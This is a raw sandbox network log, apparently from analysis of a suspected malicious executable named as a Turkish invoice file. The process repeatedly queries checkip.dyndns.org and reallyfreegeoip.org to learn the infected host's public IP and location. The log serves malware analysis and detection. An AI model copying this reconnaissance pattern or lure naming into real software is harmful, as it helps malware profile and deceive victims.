May 3, 2024 15:18:57.182941914 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:18:57 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 45399002aef10569bdef0acf5d0d5ee6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49715	132.226.247.73	80	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 15:18:57.807873964 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 3, 2024 15:18:58.004662991 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:18:57 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bac3290e3b47e1fafb35f3d531444320 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49717	132.226.247.73	80	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 15:18:59.622492075 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 3, 2024 15:18:59.819750071 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:18:59 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8146b6e5c515202fae1dc861124cd90d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49719	132.226.247.73	80	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 15:19:00.548125982 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 3, 2024 15:19:00.745521069 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:19:00 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 635a8808da6f0c19cb48aecc91b2e3f3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49721	132.226.247.73	80	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 15:19:01.377126932 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 3, 2024 15:19:01.573478937 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:19:01 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 167a9b2fcfe17697bbbd2e138662bd5e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49723	132.226.247.73	80	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 15:19:02.188992023 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 3, 2024 15:19:02.385395050 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:19:02 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1a32cc3d80f490d46d5a46c0670505a8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	172.67.177.134	443	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 13:18:55 UTC	87	OUT	GET /xml/191.96.227.219 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-03 13:18:56 UTC	693	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:18:56 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: MISS Last-Modified: Fri, 03 May 2024 13:18:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B9ViBUHUk3U8AH9q9H56Xiq7%2BOSDIRTisb2kMkANS5UOewfWjr5flNU4P5jjkYpjp6pNwj49L0xns1t900hBIbrtpQb8uphZVyyGrvelOfgnFFSDtGW9uywN2UNJ9JMyzDJawsQ9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e08a2e9f1b4276-EWR alt-svc: h3=":443"; ma=86400
2024-05-03 13:18:56 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
2024-05-03 13:18:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	172.67.177.134	443	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 13:18:56 UTC	63	OUT	GET /xml/191.96.227.219 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-03 13:18:56 UTC	706	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:18:56 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 0 Last-Modified: Fri, 03 May 2024 13:18:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nlzILZaEUx%2BX6IH2fkImVdb98HndDv6aLEq%2BqzUFDUG2ldl9CBZeZqLHiXXvLBiytPPZhIDPNCRZUzhdPAHXhoc%2Bvj6GGMZems%2FPUdMl3GyNhzLGy8d8ipIEvnNKp9Rz4YZQ%2FvMw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e08a348d638c57-EWR alt-svc: h3=":443"; ma=86400
2024-05-03 13:18:56 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
2024-05-03 13:18:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	172.67.177.134	443	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 13:18:57 UTC	87	OUT	GET /xml/191.96.227.219 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-03 13:18:57 UTC	706	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:18:57 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1 Last-Modified: Fri, 03 May 2024 13:18:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Qtkms5SHASzez0WVJ10VNEoV1BlKrHZhfinEpAajp7S5ctQjeFSOoN0JSWGBJuYfVtiD%2F%2BpzZTdtsjx4aar4P6aFOTvE7r47RSzVYsSOEHqH2dlWqJd%2BvJYpS%2FWTpCSR4%2BLN9qa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e08a39af4f425d-EWR alt-svc: h3=":443"; ma=86400
2024-05-03 13:18:57 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
2024-05-03 13:18:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	172.67.177.134	443	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 13:18:59 UTC	63	OUT	GET /xml/191.96.227.219 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-03 13:18:59 UTC	708	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:18:59 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 3 Last-Modified: Fri, 03 May 2024 13:18:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tmgTui357ly32WDnrM%2FfbNLSOySu%2FxGn3axN9KuOe4p9OT%2BTWl%2F4%2BpdN1c4AM5zU54sfHoCTdbx9Nefo3zQFdPF3zf6KHHVSsKGO%2BonymMpUctXGmkwdU3SZ04QdRxJJqpFNR1fd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e08a4368a0425e-EWR alt-svc: h3=":443"; ma=86400
2024-05-03 13:18:59 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
2024-05-03 13:18:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49718	172.67.177.134	443	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 13:19:00 UTC	87	OUT	GET /xml/191.96.227.219 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-03 13:19:00 UTC	706	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:19:00 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4 Last-Modified: Fri, 03 May 2024 13:18:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BaTM%2BFCjyVxjiyzJI0a%2B9P0ZflV4efQVKxdhikll32rt4VP3gCP9ML1PILz0Ze43JRsrJnq%2B4HVY2Ot5N8A9rh9EjIgn0OKBsE7GyJbnp2g2Ad6A37nQDVh2Zoxqd1M8h%2FhZcf8o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e08a4a28cf1a3c-EWR alt-svc: h3=":443"; ma=86400
2024-05-03 13:19:00 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
2024-05-03 13:19:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49720	172.67.177.134	443	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 13:19:00 UTC	87	OUT	GET /xml/191.96.227.219 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-03 13:19:01 UTC	714	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:19:01 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 5 Last-Modified: Fri, 03 May 2024 13:18:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QXTzEsgUmVQoi%2FRZgHUbnoIduJplVMiCOYby3PGzr%2BmCLUAwUqFAZ%2BiD%2Bb0myErpDbUxxU2iOUEFbzUy%2FO37%2Bu%2FR2OfL07dWfjf9fwJL4bE1v%2FWa%2BrDpqL6xM3N3H7WIxKLXpaso"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e08a4ffe9843a9-EWR alt-svc: h3=":443"; ma=86400
2024-05-03 13:19:01 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
2024-05-03 13:19:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	172.67.177.134	443	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 13:19:01 UTC	87	OUT	GET /xml/191.96.227.219 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-03 13:19:01 UTC	704	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:19:01 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 5 Last-Modified: Fri, 03 May 2024 13:18:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=27PCZLAZAId3Oyct1VKFNWczwe7XljNAxcv%2FuqfWVgC5BdHOjfer2uEufoFf51GTK1U4sQK1s2NKiqnLY%2BsPqxVKtnYVz1W83%2FUstFIBQh3KKgGpxrSq7MRLJEJtxrUGkhu%2BNsft"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e08a551af57c7b-EWR alt-svc: h3=":443"; ma=86400
2024-05-03 13:19:01 UTC	369	IN	Data Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
2024-05-03 13:19:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49724	172.67.177.134	443	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 13:19:02 UTC	87	OUT	GET /xml/191.96.227.219 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-03 13:19:02 UTC	698	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:19:02 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 6 Last-Modified: Fri, 03 May 2024 13:18:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oZazoxRapQ5NnbAJb0NZAPaZLmF4uxtqrIdRNwPY42v298R48u4oBtxjdHDnMqr8otY7MmgvUF88oNuTKb%2Br2AmnPJGlrfp0VuovLRwbCogP3EQjCSIEIHG3bOxiNSlAo6rD4bFh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e08a5a2f3641c0-EWR alt-svc: h3=":443"; ma=86400
